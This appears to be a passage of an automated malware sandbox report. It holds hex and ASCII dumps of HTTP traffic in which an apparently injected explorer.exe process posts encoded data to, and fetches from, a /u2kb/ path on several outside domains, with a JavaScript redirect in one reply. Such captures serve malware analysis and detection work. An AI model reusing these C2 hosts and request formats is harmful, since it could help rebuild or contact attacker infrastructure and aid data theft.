                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 79 6f 75 6e 72 6f 63 6b 2e 63 6f 6d 2f 75 32 6b 62 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 33 4f 54 4d 7a 4e 54 49 79 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 6a 63 35 4d 7a 49 34 4d 44 49 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 63 79 62 6e 4d 35 61 44 42 6e 63 6d 45 33 62 6d 30 79 4f 44 41 77 5a 54 45 31 59 32 55 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4e 7a 6b 7a 4d 6a 67 77 4d 6a 55 73 49 6e 52 7a 49 6a 6f 78 4e 6a 63 35 4d 7a 49 34 4d 44 49 31 4f 54 59 31 4d 54 6b 77 66 51 2e 56 73 36 37 6d 31 34 78 4b 62 7a 58 75 75 4c 4d 50 33 6b 51 74 68 30 79 30 6d 63 35 68 31 53 58 30 51 6b 6a 64 34 32 6a 4a 71 4d 26 70 4a 3d 79 30 62 4d 56 47 68 4b 33 52 26 73 37 3d 30 35 74 50 77 71 53 64 71 58 4f 32 78 66 33 32 42 48 51 69 38 45 31 6e 55 66 6f 46 61 32 63 38 30 68 68 42 33 73 51 33 46 46 44 4e 50 73 35 41 5a 44 55 36 45 6a 55 79 6d 6c 6c 32 32 57 6d 36 53 63 6a 35 78 62 7a 67 33 47 64 58 79 75 48 67 53 4b 71 38 72 54 50 51 57 31 76 57 49 61 32 57 75 67 25 33 44 25 33 44 26 73 69 64 3d 35 33 66 65 30 37 65 65 2d 63 37 33 38 2d 31 31 65 64 2d 38 33 32 39 2d 35 62 62 65 37 35 32 36 30 39 65 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3OTMzNTIyNSwiaWF0IjoxNjc5MzI4MDI1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDcybnM5aDBncmE3bm0yODAwZTE1Y2UiLCJuYmYiOjE2NzkzMjgwMjUsInRzIjoxNjc5MzI4MDI1OTY1MTkwfQ.Vs67m14xKbzXuuLMP3kQth0y0mc5h1SX0Qkjd42jJqM&pJ=y0bMVGhK3R&s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug%3D%3D&sid=53fe07ee-c738-11ed-8329-5bbe752609ee');</script></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            11192.168.2.44970745.33.30.19780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:31.403007030 CET141OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.thewildphotographer.co.uk
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.thewildphotographer.co.uk
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.thewildphotographer.co.uk/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 43 42 4b 47 56 48 4e 35 68 5a 33 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzCBKGVHN5hZ31ZK9KUA).
                                                                                            Mar 20, 2023 17:00:31.549699068 CET143INHTTP/1.1 200 OK
                                                                                            server: openresty/1.13.6.1
                                                                                            date: Mon, 20 Mar 2023 16:00:31 GMT
                                                                                            content-type: text/html
                                                                                            transfer-encoding: chunked
                                                                                            content-encoding: gzip
                                                                                            connection: close
                                                                                            Data Raw: 31 42 38 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 9d 6b 53 db 48 da b0 bf 3f bf c2 a8 b6 58 fb 45 38 1c 72 20 26 0e 4b 80 24 cc 26 90 01 32 c9 2c 4b 51 c2 16 a0 c4 48 8c 2c 43 18 f0 7f 7f af fb ee 6e a9 7d 20 24 fb ec 7e 78 aa 76 6a 37 c8 52 ab d5 87 fb 7c ea 17 33 9b bb 1b 07 bf 7f d8 aa 9d 17 17 bd 97 ff f3 42 fe d4 7a 51 7a d6 0e e2 34 78 f9 3f 35 fe 7b 71 1e 47 5d 73 a9 3f 2f e2 22 aa 75 ce a3 bc 1f 17 ed e0 e3 c1 eb f9 15 db b2 7a 7c 5e 14 97 f3 f1 1f 83 e4 aa 1d 7c 9b 1f 44 f3 9d ec e2 32 2a 92 93 5e 1c d4 3a 59 5a c4 29 ef 6e 6f b5 e3 ee 59 1c bc 7c d1 ef e4 c9 65 51 2b 6e 2e e3 76 50 c4 df 8a 47 5f a2 ab c8 dc 0d 5e d6 af 93 b4 9b 5d 37 77 f6 b6 3e be bf bb ab eb df f6 ed b0 d1 68 26 69 52 b4 6f 2f f3 e4 2a ea dc b4 6e 3b 59 f6 35 89 fb c7 71 1a f1 a9 6e eb 34 ea f5 e3 61 18 7d 89 be b5 6e bb 71 7a 73 dc 4b fa 45 eb 30 38 89 2e 9a 69 3e df 8d 8a a8 99 c6 45 70 34 1c ae 7e e7 33 bd 2c ea c6 f9 31 23 3f 4d ce da b7 df 2e 93 6e 2b f8 78 fd fb eb 8f af 7f fb f4 e6 7a fd d5 c7 df ba 07 9b 67 9d 0f 41 d8 4b 3a 71 da 8f ff 1e df b4 82 85 ee f2 ca 93 93 68 25 5a 08 c2 e8 f2 92 47 ac 41 96 6e 6f b6 82 e5 c5 27 4f 17 9f 3f 5d 09 86 ab ab f5 7a a3 fd f2 f6 2a ca 6b 71 58 84 79 fb f6 f9 c2 b3 c5 56 5d 7f c8 93 60 d0 8f 6b fd 22 4f 3a 45 b0 9a 37 bb f5 22 bc dd 6e c9 4b e9 b0 b1 2a ef a5 ed 85 30 69 a7 d1 55 72 16 15 59 de e4 85 7c fd 8c 45 6e 5e 44 45 e7 bc fe e8 75 92 c7 a7 d9 b7 c3 7f 3e fa 67 ff a8 fe cf ee dc 3f 9b fc d3 78 d4 58 4d 66 67 eb 69 7b 2e 39 5c 3c 6a 0c c3 a7 4f 9e 2e 3d f0 e5 0f c7 fa e9 b3 f0 7d a1 17 57 e1 c6 13 bd e8 86 9b ef f4 e2 26 dc fd a0 17 5f c3 de 6b bd 78 1b fe 3e d0 8b ad 70 f3 4c 2f 2e c3 8d cf 7a 71 1a be d9 d2 8b eb b0 ff 51 2f de 95 93 ba 1d 32 dd bc 9e 36 42 99 75 1a de 46 32 27 6d b4 1e ea cc f4 7a 3f bc 8a f3 3e 0b ab bf be d9 d7 93 76 5e 7f fa ec f9 b3 46 98 71 f5 7c e1 79 23 8c b8 58 79 ba b8 d0 58 ed f4 a2 7e bf d6 07 60 52 16 76 d0 61 d1 64 bd 1b b7 45 7e 73 9b 9c d6 67 e2 bb bb 20 3b f9 12 b3 e4 33 6d 81 cb ec b4 16 37 f2 b8 18 e4 69 7d 21 8c 9a ff 68 d4 83 9d f8 ba 06 16 14 49 7a 56 8b 6a 1b 0a 1d 83 5c 40 af 96 0b f4 e7 71 bf 16 a5 35 d3 4f 2d ea d7 92 f4 72 50 04 2c 3a 5f 28 a6 7c a1 18 ff c2 fe 43 bd d7 2e b2 6e dc ab 15 99 0c a4 96 14 f2 8d a4 48 a2 5e ed 32 cf 2e e3 bc 00 1d f8 e0 ae 4e a5 c9 a4 93 b3 b4 5e 9c 27 7d 26 1b da bb ac 69 4e b3 7a dc 68 9e 66 f9 56 04 c0 d4 63 e0 ae 17 17 87 c0 e3 51 3b 5e d5 75 02 cc 98 7a d6 fc a3 51 2f 1a ab 69 b3 17 a7 67 c5 f9 ec 6c 3e 3b eb d6 aa ed d6 8a 7b e9 68 6f 31 23 ab 71 bb ee 96 ef af c1 5f 9b f4 0b 4e b0 f4 7f 0d 6a 09 8b 25 a3 2e 58 f4 b8 5b 8b 0a 46 75 32 28 62 96 b0 5b eb b0 8e 69 56 d4 4e 62 a1 3d e9 19 0d e8 ee 34 8e d8 90 b8 f6 d7 86 eb a9 08 83 66 ad b6 5d d4 ae 93 5e af 76 1e 5d c5 bc 56 8b 4f 4f e9 b4 19 34 1a 21 ab 15 d3 67 7e 18 03 ef fc 96 b5 38 2c 8e da 39 3f 86 8c 85 c9 c7 8d 5b 37 c6 60 3d ad c5 79 9e e5 b5 ac d3 e1 4b dd da f5 79 c2 f6 4e df f5 20 8c 1b c3 e1 d0 2c 56 a7 7d 7b 12 47 5c b7 92 66 27 6e 9a eb 50 3b 7b e5 dd f7 6e f8 b4 e3 2a 4b ba 35 e0 6c 84 6a d8 9b fd a8 65 af fe 18 c4 83 f8 20 b9 88 dd 0d af bd 7f bb 28 de 0c 20 59 f6 2d a1 0e ee 3a ea 74 b2 01 38 65 1f b1 fc 5d b0 c1 fd 84 12 e7 e5 c7 be f4 d7 dd 96 f4 5b b7 c3 50 89 4c 75 c7 f6 c0 b6 f5 dd eb bc 9c f6 a3 8e d0 bc 9d a8 1a 64 21 3f 3e f4 a2 24 b5 0d e9 0b 72 be 7a 3a 48 b5 6d ad 2b 5b
                                                                                            Data Ascii: 1B8EkSH?XE8r &K$&2,KQH,Cn} $~xvj7R|3BzQz4x?5{qG]s?/"uz|^|D2*^:YZ)noY|eQ+n.vPG_^]7w>h&iRo/*n;Y5qn4a}nqzsKE08.i>Ep4~3,1#?M.n+xzgAK:qh%ZGAno'O?]z*kqXyV]`k"O:E7"nK*0iUrY|En^DEu>g?xXMfgi{.9\<jO.=}W&_kx>pL/.zqQ/26BuF2'mz?>v^Fq|y#XyX~`RvadE~sg ;3m7i}!hIzVj\@q5O-rP,:_(|C.nH^2.N^'}&iNzhfVcQ;^uzQ/igl>;{ho1#q_Nj%.X[Fu2(b[iVNb=4f]^v]VOO4!g~8,9?[7`=yKyN ,V}{G\f'nP;{n*K5lje ( Y-:t8e][PLud!?>$rz:Hm+[
                                                                                            Mar 20, 2023 17:00:31.549746990 CET144INData Raw: a0 58 d8 28 ce f3 ec ba 96 82 68 5b b2 0d f5 60 9d 6d 4d d2 d3 cc 62 55 df 61 9a 20 9a 92 87 5a 02 a1 2f 92 d3 24 ce 67 2c aa 0d 64 b3 27 7a da 96 5e 00 f8 5a e0 80 27 0e 83 da 35 68 9a c6 10 14 d9 63 00 66 d5 e0 7c 4d fa 18 96 23 3c 35 d4 e2 df
                                                                                            Data Ascii: X(h[`mMbUa Z/$g,d'z^Z'5hcf|M#<54F-sC;K4<pxQ]v5g&)$yn~tE^,vtu^s|1X:Y?R|.>J8,O~Zvr:%&|
                                                                                            Mar 20, 2023 17:00:31.549766064 CET145INData Raw: 7f 60 a3 8c 45 ac 1b ee e9 86 75 bc 0d 5b 7e f6 64 49 84 b6 bc fe 6c 61 89 2b b1 52 3d 5e 78 fc c4 98 a9 96 96 97 9e 38 f0 e8 8f 90 82 8e 41 31 03 39 18 0b fb 05 7b dd 15 22 0a 01 83 0e 16 37 ad a8 79 c9 5c ef ee 16 86 ab 03 80 32 ec 83 26 c2 0e
                                                                                            Data Ascii: `Eu[~dIla+R=^x8A19{"7y\2&X;5E=U<*GC"taC(?\@ravq0H{wqG\cP7HLTY6R[<n#:FeK&v6cPK#fMP%of6;
                                                                                            Mar 20, 2023 17:00:31.549777985 CET146INData Raw: c0 bd 28 74 42 a6 9f 4f 8a 7f 4b 53 c5 bf a5 23 c4 29 27 65 0a c3 b6 56 8b 89 79 0a 34 44 f0 25 0f 20 ac 98 fc bf fb 5e 37 eb a8 88 3b b9 b2 d5 17 87 a1 58 79 1e 00 90 b7 c6 6b 1d 85 ef 15 2c b2 70 af 67 10 37 fc 7a a3 17 fd 09 40 29 97 3e 61 bf
                                                                                            Data Ascii: (tBOKS#)'eVy4D% ^7;Xyk,pg7z@)>ab+Z\}\/,^[|2ssG}T71t~(8fs{zQ1Il%B"7/?7t"/"+dv{668vk@qgbj7\
                                                                                            Mar 20, 2023 17:00:31.549799919 CET148INData Raw: 2f 5b 17 42 e9 a3 43 07 ed ef 5e a7 1f 4c f0 e4 4d c5 97 ad da ac b8 9b 36 3b 84 24 e9 c4 1d 02 23 59 c3 0d 90 d2 85 cb 2b e1 b5 3d 77 e3 d3 24 8d 5d 7f b3 b3 9e cf a2 21 48 66 f7 6a 6a 6b f9 82 e3 1a 49 78 8d 6d 5f 1d 8f e8 7c 71 8a 5e a2 91 a6
                                                                                            Data Ascii: /[BC^LM6;$#Y+=w$]!HfjjkIxm_|q^Ct6Nu9^l91I>AA-0t~*JhVWs$G^_ZC;d]~f8PM ;-fBzs\Us^x@lk'
                                                                                            Mar 20, 2023 17:00:31.549818993 CET149INData Raw: c6 79 1a e9 ad 83 ed f7 b6 49 2f dc da 31 42 e9 00 ce b3 7e f0 71 6f eb 78 67 fd bd 69 9c 84 af 77 8e dd f3 53 f9 b1 7f b0 be 77 a0 db dc 0d 77 f7 b6 df 98 af ea 8d b3 f0 c3 c7 fd b7 d2 e2 c0 bc 7d 0e 4b f4 be dc 2f 7f 1e f3 f9 ed 9d 37 c7 af 3e
                                                                                            Data Ascii: yI/1B~qoxgiwSww}K/7>~w;c{$lFx8fceI\cj1i0!@/ay@I !JGoe;w_O@Qks0fjfA,fg4Fc|KFH}
                                                                                            Mar 20, 2023 17:00:31.549839020 CET150INData Raw: 31 43 34 38 0d 0a 2c fe bd 0b 43 c8 d4 b6 b7 2f 6b 60 25 f1 03 d4 b3 ad f6 b1 6e 71 78 a0 17 a7 19 d9 4c c7 a4 7d 78 65 1a c2 fd f6 31 b8 ab 9e 9d fa c1 08 21 54 0a 38 7a 8b a4 14 63 54 24 9b 16 7d 4e 89 d5 86 46 f3 1d d8 5f 9b 67 e2 c1 da 12 15
                                                                                            Data Ascii: 1C48,C/k`%nqxL}xe1!T8zcT$}NF_gy%w;r2'oR/4Hcg07d>7sA JSjq>%6j~C*3v4"SDXu++P3r^7"`^kWD(z)g*
                                                                                            Mar 20, 2023 17:00:31.549860001 CET151INData Raw: 12 e7 d2 17 c9 6a 23 93 8c 0d 89 72 26 36 cf c2 07 ee 68 51 78 fc 18 2c 05 7b 11 50 88 70 02 05 57 11 21 0c 99 26 9c c8 49 8e 35 f2 6f d0 10 19 b8 0a 3e 99 b6 6c df da 7b 7e 96 50 4e 17 a4 90 e1 5b 31 ed 6d 12 85 f9 31 a4 fa 02 46 a0 a4 99 4a 82
                                                                                            Data Ascii: j#r&6hQx,{PpW!&I5o>l{~PN[1m1FJ((nT[:$)sM>1"<G0%@Z3"[Y.Ex/MLBg!j)W"KM<e)!/VawNt!hyw7h4rOy
                                                                                            Mar 20, 2023 17:00:31.549881935 CET153INData Raw: f4 5c 3e 04 3f bb 3c 12 95 30 ad c8 59 0d 5b 01 34 15 e2 eb 74 2e 95 cb ac 09 67 46 d2 c0 51 fc 8a e6 7b b2 24 f2 30 f0 2b 51 36 6d dd 42 2c 17 43 9e 11 f8 c6 b4 53 75 42 90 8d c2 70 c5 01 4a 2e 8a 29 6d db 91 0b f5 6f 0d e4 a1 fa b2 ba 5c 99 d4
                                                                                            Data Ascii: \>?<0Y[4t.gFQ{$0+Q6mB,CSuBpJ.)mo\S$IZos%Xjz.J=]W\r/j> yG:s5&mT"XX2cJE(E\hcbWY:Z:BY'"W=[PGz]8d+RH(
                                                                                            Mar 20, 2023 17:00:31.549896002 CET154INData Raw: 66 f5 c6 24 2f 13 27 46 45 8d 3e 78 39 33 1f 46 d6 a2 50 31 eb 0b 54 d7 94 20 db e0 4a 8b ce 2a 5d de 0e 77 e4 89 a4 82 53 4f 14 81 5e 53 c6 bf ca 3d c2 73 1b e1 3b b1 a9 bf f5 e8 24 a9 08 63 15 4a 4d 96 76 ff 3c bb 86 95 bb d9 b2 a8 b7 e4 9c 4a
                                                                                            Data Ascii: f$/'FE>x93FP1T J*]wSO^S=s;$cJMv<J_JuBU&&&@/%E:?q80~EnJMkQqO/ECBj5E6#>&>sa^x eQTIykI~L,JZY/+zgUZ8~`3
                                                                                            Mar 20, 2023 17:00:31.691642046 CET155INData Raw: 52 26 ad e3 0a b5 fe 34 02 b2 46 9a 3f 5c 5a 58 08 9f 2c 50 24 fa 2f d6 41 84 61 a0 fd aa 1e 6c ef 7c 20 60 20 1b a1 ef 3f ca 3e 0b d1 a0 25 d3 07 a3 f2 bc 39 e5 4f 0c 91 4a c5 ad 06 33 23 44 54 5c 71 e5 50 3d 6d be 24 f7 f7 36 a9 e8 b5 48 f7 25
                                                                                            Data Ascii: R&4F?\ZX,P$/Aal| ` ?>%9OJ3#DT\qP=m$6H%MFU<)=:6T%D%iXzP=#2 F]E)yib${~L,qq^bU<:oXq5c32\^^oj^ZQ?z[xW, 7{BHYr&H


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            12192.168.2.44970845.33.30.19780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:34.078017950 CET165OUTGET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1
                                                                                            Host: www.thewildphotographer.co.uk
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Mar 20, 2023 17:00:34.220544100 CET165INHTTP/1.1 404 Not Found
                                                                                            server: openresty/1.13.6.1
                                                                                            date: Mon, 20 Mar 2023 16:00:34 GMT
                                                                                            content-type: text/html
                                                                                            content-length: 175
                                                                                            connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            13192.168.2.449709199.192.30.14780C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Mar 20, 2023 17:00:39.495053053 CET166OUTPOST /u2kb/ HTTP/1.1
                                                                                            Host: www.shapshit.xyz
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.shapshit.xyz
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.shapshit.xyz/u2kb/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 73 37 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 57 6d 76 46 37 75 58 4e 7e 54 6f 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: s7=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErWmvF7uXN~ToXN-P3RA).
                                                                                            Mar 20, 2023 17:00:39.794625998 CET168INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 20 Mar 2023 16:00:39 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 4406
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
